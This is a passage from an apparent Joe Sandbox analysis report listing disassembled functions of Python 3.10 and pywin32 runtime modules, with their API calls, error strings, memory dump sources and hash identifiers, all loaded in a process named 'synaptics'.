                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionThrow$_callnewhmalloc
                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                              • API String ID: 4113974480-410509341
                                                                                                                                                                                                              • Opcode ID: c187658f1486c153890976940a87628c179a41a9ce40ea9a41dba40b727f2118
                                                                                                                                                                                                              • Instruction ID: 69067a0fd58f0f648492017e23e3ae4914690684ecb948e360b31bc147368613
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c187658f1486c153890976940a87628c179a41a9ce40ea9a41dba40b727f2118
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5F0F63F94020E778B04AABCE80595D3F7C9F01258B5085E4E928D64B3FB3CDA2986E0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyDict_DelItem.PYTHON310(?,?), ref: 6C0A1127
                                                                                                                                                                                                              • _PyErr_WriteUnraisableMsg.PYTHON310(on calling _ctypes.DictRemover,00000000), ref: 6C0A113C
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A1159
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A1176
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • on calling _ctypes.DictRemover, xrefs: 6C0A1137
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Dict_Err_ItemUnraisableWrite
                                                                                                                                                                                                              • String ID: on calling _ctypes.DictRemover
                                                                                                                                                                                                              • API String ID: 2766432985-2232269487
                                                                                                                                                                                                              • Opcode ID: 67351fe20dd718ba5f29517b922316934bb99985cb848aad269e7f611f328182
                                                                                                                                                                                                              • Instruction ID: 4582c1e1b5b586d8e25ec707b4ad637c96f34a9e966e338e91f6baaed3a37b17
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67351fe20dd718ba5f29517b922316934bb99985cb848aad269e7f611f328182
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D0171F0604702CFDB048BA5DC45B5333F8AF01B3DF144A18E87A9AAD2D731E4118B55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,PyDEVMODE cannot be None in this context), ref: 6BF441E1
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Object must be a PyDEVMODEW), ref: 6BF44203
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • PyDEVMODE cannot be None in this context, xrefs: 6BF441DA
                                                                                                                                                                                                              • Object must be a PyDEVMODEW, xrefs: 6BF441FC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String
                                                                                                                                                                                                              • String ID: Object must be a PyDEVMODEW$PyDEVMODE cannot be None in this context
                                                                                                                                                                                                              • API String ID: 1450464846-2899910425
                                                                                                                                                                                                              • Opcode ID: f70529653c26b2aad0b1833b0a0ec0d8a5b5360b8a1ea22d25fa647c819272b2
                                                                                                                                                                                                              • Instruction ID: 14556e51fbb95fc4d404816e059382e952333cff2274d293f31c6c689fa64072
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f70529653c26b2aad0b1833b0a0ec0d8a5b5360b8a1ea22d25fa647c819272b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6001A232024210DFDB05EF18E844B967BE0FB55314F0044A9F445C7636C775EDA8CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyLong_FromSsize_t.PYTHON310(?), ref: 6C0AAC86
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B56F8), ref: 6C0AAC9F
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,this type has no size), ref: 6C0AACB8
                                                                                                                                                                                                              • PyLong_FromSsize_t.PYTHON310(?), ref: 6C0AACC9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FromLong_Ssize_t$Err_StringSubtypeType_
                                                                                                                                                                                                              • String ID: this type has no size
                                                                                                                                                                                                              • API String ID: 3401881653-982649334
                                                                                                                                                                                                              • Opcode ID: 3f5acb5b1979b5a038d589176dc2be3e7e55a65dbc6de7bbc5ab8621121a8908
                                                                                                                                                                                                              • Instruction ID: dacdc1ba7c6b27ec13362331ab05895818e2a6cd8401f33a70bc589b96bdeaf1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f5acb5b1979b5a038d589176dc2be3e7e55a65dbc6de7bbc5ab8621121a8908
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63F0F471604200ABDB008FC4EA4978677F8EF01B2EF148874E84ED6912EB33E865CB49
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF8634C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86354
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8635C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86364
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8636C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86374
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6BF8637A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 3a6d949b04e7535ea484e9723ec96622e7952ba843b879a030d5689f365556bd
                                                                                                                                                                                                              • Instruction ID: 1b5dc8fb6f2fa4e791aa3c7ac0e029026772ba72906afae7a03d4f4306cb1c76
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a6d949b04e7535ea484e9723ec96622e7952ba843b879a030d5689f365556bd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0F09E72E4012897EA119A28AC536DF7B21AF45329F590032EC5A25260F927A9389AD3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A1EF2
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,_type_ must have storage info), ref: 6C0A1F0A
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,_type_ must be a type,6C0A206D,00000000), ref: 6C0A1F23
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • _type_ must have storage info, xrefs: 6C0A1F03
                                                                                                                                                                                                              • _type_ must be a type, xrefs: 6C0A1F1C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String$Dealloc
                                                                                                                                                                                                              • String ID: _type_ must be a type$_type_ must have storage info
                                                                                                                                                                                                              • API String ID: 153118240-214983684
                                                                                                                                                                                                              • Opcode ID: 972477e3616659f194f0a5388f2cc40c6251c4f482d32e63abdef9c2789e0765
                                                                                                                                                                                                              • Instruction ID: 070bb153a684278ba8d5f68f16118eaf6a5c8fda2fdd5d91c102c131810679be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 972477e3616659f194f0a5388f2cc40c6251c4f482d32e63abdef9c2789e0765
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 840181B0A05541CFDB04CBA8CA45B447BF4BF0232DB584B60E52AD79A2DB32D847CB00
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySys_GetObject.PYTHON310(stderr), ref: 6C0A8799
                                                                                                                                                                                                              • PyOS_vsnprintf.PYTHON310(?,00000200,?,?), ref: 6C0A87B4
                                                                                                                                                                                                              • PyFile_WriteString.PYTHON310(?,00000000), ref: 6C0A87D1
                                                                                                                                                                                                              • PyErr_Print.PYTHON310 ref: 6C0A87DA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_File_ObjectPrintS_vsnprintfStringSys_Write
                                                                                                                                                                                                              • String ID: stderr
                                                                                                                                                                                                              • API String ID: 1103062482-1769798200
                                                                                                                                                                                                              • Opcode ID: 5e9af4fd4387224628702ba381057922a8581b977e42aaed324b94cd00895c08
                                                                                                                                                                                                              • Instruction ID: 5ada98105506d40afcf15747ff5c307809da8b2761785f9d9482dbf27db18188
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e9af4fd4387224628702ba381057922a8581b977e42aaed324b94cd00895c08
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14F0C8B1A0121DDBCF10EBE4CA48ADE7BB8EF05208F014191ED1997101EA31AA188BD5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES310(?,?,?,00000000), ref: 6BF4ABE0
                                                                                                                                                                                                                • Part of subcall function 6BF49350: PyUnicode_AsWideCharString.PYTHON310(00000000,00000000,00000000,?,6BF41E0A,?,0000001C,00000000,00000000), ref: 6BF49372
                                                                                                                                                                                                                • Part of subcall function 6BF49350: PyErr_SetString.PYTHON310(6C7EADFC,Getting WCHAR string,00000000,00000000), ref: 6BF49393
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF4ABEC
                                                                                                                                                                                                              • ?PyWinLong_AsVoidPtr@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,?), ref: 6BF4ABF7
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyNumber_Long.PYTHON310(?,?,?,?,6BF4443E,?,?,6BF443B3,?,?), ref: 6BF4AA68
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Occurred.PYTHON310(?), ref: 6BF4AA7D
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Format.PYTHON310(6C7E9584,Unable to convert %s to pointer-sized value,6BF4F284), ref: 6BF4AA95
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Resource id/name must be unicode or int in the range 0-65536), ref: 6BF4AC1D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Resource id/name must be unicode or int in the range 0-65536, xrefs: 6BF4AC16
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$String$U_object@@$CharClearFormatLongLong_Number_Object_OccurredPtr@@Unicode_VoidWide
                                                                                                                                                                                                              • String ID: Resource id/name must be unicode or int in the range 0-65536
                                                                                                                                                                                                              • API String ID: 2758837962-4091729669
                                                                                                                                                                                                              • Opcode ID: 4a314388653fc961523059e018b8184957fd4d2b2ee74024a1db1e7d15d70850
                                                                                                                                                                                                              • Instruction ID: 4e752bf40afcad94e93464d67de2798dbc64b34fb0cfe51ee5f37f93cff0a15c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a314388653fc961523059e018b8184957fd4d2b2ee74024a1db1e7d15d70850
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17F0E2338141129BDB00AF24FD05B877FE0EF15310F004864F944822BAE336D964CA62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?PyWinObject_AsChars@@YAHPAU_object@@PAPADHPAK@Z.PYWINTYPES310(?,?,?,00000000), ref: 6BF4AB50
                                                                                                                                                                                                                • Part of subcall function 6BF49060: PyErr_SetString.PYTHON310(6C7E9584,None is not a valid string in this context), ref: 6BF49082
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF4AB5C
                                                                                                                                                                                                              • ?PyWinLong_AsVoidPtr@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,?), ref: 6BF4AB67
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyNumber_Long.PYTHON310(?,?,?,?,6BF4443E,?,?,6BF443B3,?,?), ref: 6BF4AA68
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Occurred.PYTHON310(?), ref: 6BF4AA7D
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Format.PYTHON310(6C7E9584,Unable to convert %s to pointer-sized value,6BF4F284), ref: 6BF4AA95
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Resource id/name must be string or int in the range 0-65536), ref: 6BF4AB8D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Resource id/name must be string or int in the range 0-65536, xrefs: 6BF4AB86
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$StringU_object@@$Chars@@ClearFormatLongLong_Number_Object_OccurredPtr@@Void
                                                                                                                                                                                                              • String ID: Resource id/name must be string or int in the range 0-65536
                                                                                                                                                                                                              • API String ID: 2237686557-907244015
                                                                                                                                                                                                              • Opcode ID: ec6a9ecf5e50ef8f6d7d754c1ddb1997630dae2bcd6893fab5eb62c0ccf76adf
                                                                                                                                                                                                              • Instruction ID: 3dee28c37a24d4162093846f81b100acd18f0ffbb613bb5076f55b9dc332266f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec6a9ecf5e50ef8f6d7d754c1ddb1997630dae2bcd6893fab5eb62c0ccf76adf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88F02733414212AFDB116F24FD05B8A7FE4EF00300F004868F84482277E375D965CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyEval_SaveThread.PYTHON310 ref: 6BF445FB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6BF44606
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6BF4460F
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(CloseHandle,00000000), ref: 6BF44629
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Eval_Thread$BuildCloseDecodeErrorError@@FormatHandleLastMessageRestoreSaveSizeU_object@@Unicode_Value_Win_
                                                                                                                                                                                                              • String ID: CloseHandle
                                                                                                                                                                                                              • API String ID: 425343532-2962429428
                                                                                                                                                                                                              • Opcode ID: 578e2098e28cb781e3a86489cc03ecb63418e23708f8514cd93432d6ead0acda
                                                                                                                                                                                                              • Instruction ID: c37ac80b2b4095b535b86dbf72c0e85d1f9feca7d92ddaa4a98a08d0f1ea8f4a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 578e2098e28cb781e3a86489cc03ecb63418e23708f8514cd93432d6ead0acda
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89E09B7353010057DF015F7598887457F64DB95366F0880B5F908D6216D779C418DF71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(?), ref: 6BF4B051
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(?), ref: 6BF4B058
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(?), ref: 6BF4B05F
                                                                                                                                                                                                              • _Py_BuildValue_SizeT.PYTHON310(NiNNi(ii),00000000,?,00000000,00000000,?,?,?), ref: 6BF4B075
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FromLongLong_$BuildSizeValue_
                                                                                                                                                                                                              • String ID: NiNNi(ii)
                                                                                                                                                                                                              • API String ID: 2122494194-1588869203
                                                                                                                                                                                                              • Opcode ID: d0b621b306ee9eb102863c423d63ba3e0cc140795d6ac2a685ce829b1686233c
                                                                                                                                                                                                              • Instruction ID: 3e4200ad67f2923145979d998a1ab9af6f28da0b3f325358254b6fbf7851004d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0b621b306ee9eb102863c423d63ba3e0cc140795d6ac2a685ce829b1686233c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDE0C97751025CBB8F125FA69C48CAB3F6AEB892A1B044415FA0846121C6329970EFA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,O&:PyObj_FromPtr,Function_0000AEA0,?), ref: 6C0AAED5
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.PyObj_FromPtr,(O),?), ref: 6C0AAEEF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_AuditParseSys_Tuple
                                                                                                                                                                                                              • String ID: (O)$O&:PyObj_FromPtr$ctypes.PyObj_FromPtr
                                                                                                                                                                                                              • API String ID: 3491098224-1450318991
                                                                                                                                                                                                              • Opcode ID: 78f53db0565c5768de34eec90c18e07b9a9b12ed0c2b81020444d2c0d6be9fce
                                                                                                                                                                                                              • Instruction ID: f34abcd03e17498ebf67ccb2e8666b917c242b9160a94b9d0b5dfc40b43c72dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78f53db0565c5768de34eec90c18e07b9a9b12ed0c2b81020444d2c0d6be9fce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03E06D70605008BFDF04DBD4DE04BAD77F8DB09209B2005A1FE0DE2A52EA339A20AB95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,l:DeleteAce), ref: 6BF4356E
                                                                                                                                                                                                              • DeleteAce.ADVAPI32(?), ref: 6BF43587
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(DeleteAce,00000000), ref: 6BF43597
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_DeleteError@@ParseTupleU_object@@Win_
                                                                                                                                                                                                              • String ID: DeleteAce$l:DeleteAce
                                                                                                                                                                                                              • API String ID: 1786209359-3702189175
                                                                                                                                                                                                              • Opcode ID: 9840ccab7224e0cce7cb710b583e171ef0dbf119e5b5ce8850cf04afb389f4a5
                                                                                                                                                                                                              • Instruction ID: 621e28f52a58b6dfb62b94d647f8c07eb7e7ddbf541754f28c23109fc132f31c
